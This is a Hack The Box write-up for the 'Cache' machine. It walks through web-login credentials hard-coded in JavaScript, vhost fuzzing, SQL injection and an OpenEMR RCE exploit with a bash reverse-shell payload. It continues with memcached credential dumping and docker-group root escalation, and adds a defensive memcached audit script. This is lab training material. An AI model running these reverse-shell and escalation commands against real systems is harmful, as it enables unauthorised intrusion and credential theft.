This is the second write-up of a series on Hack The Box systems penetration tests. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.
Cache is a Linux machine released on May 9th 2020 and not yet retired (as of 9 Aug 2020). The box IP address is 10.10.10.188 and the announced difficulty is medium.
TL;DR
In this box, I wasted a lot of time trying to get an initial foothold, since it's rare to have to perform so many different scans and searches in order to find anything useful. However, once I worked out what I had to do, the box was both fun and interesting.
Part One
First of all, I started with an nmap scan:
Let's enumerate port 80; it's the only thing we can do. After some browsing, we find the login page. I thought there should be something interesting here, so check the files the login page requests: Inspect Element > Network > functionality.js.
Let's open this file with a simple GET request.
...
// Client-side check: the expected password is hard-coded in the script
function checkCorrectPassword(){
    var Password = $("#password").val();
    if(Password != 'H@v3_fun'){
        alert("Password didn't Match");
        error_correctPassword = true;
    }
}
// Same pattern for the username
function checkCorrectUsername(){
    var Username = $("#username").val();
    if(Username != "ash"){
        alert("Username didn't Match");
        error_username = true;
    }
}
...
These are the credentials for the web login page. The check runs entirely in the browser, so anyone who reads the script gets the password. Once logged in, we see an "info page" where HMS is mentioned.
Okay. Let's try wfuzz to find the HMS page. But first we'll use cewl, a tool which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be fed to password crackers or, as here, used as a wordlist.
$ cewl -w brutedns.txt -d 10 -m 1 http://10.10.10.188/author.html
and then we use wfuzz or another brute-force tool to fuzz the virtual host name (--hh 8193 hides responses of the default page's size):
$ wfuzz -w brutedns.txt -H "Host: FUZZ.htb" -u http://10.10.10.188/ --hh 8193
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.188/
Total requests: 42

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000001:   302        0 L      0 W      0 Ch        "HMS"

Total time: 0.199324
Good. Add hms.htb to /etc/hosts and request it.
So, here is OpenEMR. Let's check Exploit-DB:
As we can see, "OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution" is available, but we need credentials. I found a good video on YouTube: https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s. There is a SQL injection available too, which is neat. After five minutes I have credentials:
... and after cracking the hash:
Username: 'openemr_admin', password: 'xxxxxx'. Now we use the RCE exploit for OpenEMR mentioned above. Open a local listener with netcat (in a separate terminal) and run the exploit:
$ nc -lvnp 4444
$ python openemr_rce.py http://hms.htb/ -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/$your_ip/4444 0>&1'
Part Two
Great. We have a low-privilege shell on the box. Let's try "su ash" with the password from functionality.js.
Part Three
Memcached exploit
Let's check the locally running services:
If you google port 11211 you'll see that it is memcached. Here are some examples of memcached exploitation:
https://www.hackingarticles.in/penetration-testing-on-memcached-server/
https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
Okay. Execute "telnet 127.0.0.1 11211" on the remote machine and then "stats cachedump 1 0". You should see something like this:
After that, execute "get user" and "get passwd", then ssh to the box with the credentials you retrieved.
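As an added defensive check (my own example, not part of the original write-up or of the box), the script below parses the reply to the same "stats cachedump" command and flags cache keys whose names suggest a credential is being cached in the clear, so an administrator can audit a memcached instance for exactly what was found here. SAMPLE_DUMP is a constructed reply, not output captured from the box; the dump_slab() helper is only needed against a live server.

```python
import re
import socket

# Constructed sample of a "stats cachedump 1 0" reply in the memcached text
# protocol (ITEM <key> [<bytes> b; <expiry> s] ... END); not captured from the box.
SAMPLE_DUMP = (
    b"ITEM user [5 b; 0 s]\r\n"
    b"ITEM passwd [9 b; 0 s]\r\n"
    b"ITEM file [7 b; 0 s]\r\n"
    b"ITEM account [9 b; 0 s]\r\n"
    b"END\r\n"
)

ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (-?\d+) s\]$")
# Heuristic: key names that usually mean a secret is sitting in the cache unencrypted
SENSITIVE_RE = re.compile(r"user|pass|pwd|secret|token|cred", re.IGNORECASE)


def parse_cachedump(reply: bytes):
    """Turn a raw cachedump reply into a list of (key, size_bytes, expiry) tuples."""
    items = []
    for line in reply.decode("utf-8", errors="replace").split("\r\n"):
        if line == "END":
            break
        m = ITEM_RE.match(line)
        if m:
            items.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return items


def flag_sensitive_keys(items):
    """Return the keys an auditor should look at; an expiry of 0 means they never expire."""
    return [key for key, _size, _expiry in items if SENSITIVE_RE.search(key)]


def dump_slab(host="127.0.0.1", port=11211, slab=1, limit=0, timeout=3.0):
    """Fetch one slab's key listing from a live memcached (same command as the telnet session)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"stats cachedump {slab} {limit}\r\n".encode())
        reply = b""
        while not reply.endswith(b"END\r\n"):
            chunk = s.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply


if __name__ == "__main__":
    # Offline run on the constructed sample; pass dump_slab() instead to audit a real instance.
    found = flag_sensitive_keys(parse_cachedump(SAMPLE_DUMP))
    print("credential-looking keys:", found)  # prints ['user', 'passwd']
```

Anything this flags should not be cached in plaintext at all, because memcached has no authentication and every local process (including the low-privilege web shell above) can read it.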
Root exploitation
If you execute the 'id' command you'll see that luffy belongs to the docker group. Okay. Check GTFOBins for docker. Let's exploit it as described there:
$ docker images
$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
Congratulations, we owned CACHE! Hope you had as much fun rooting this box as I did! Have a great day!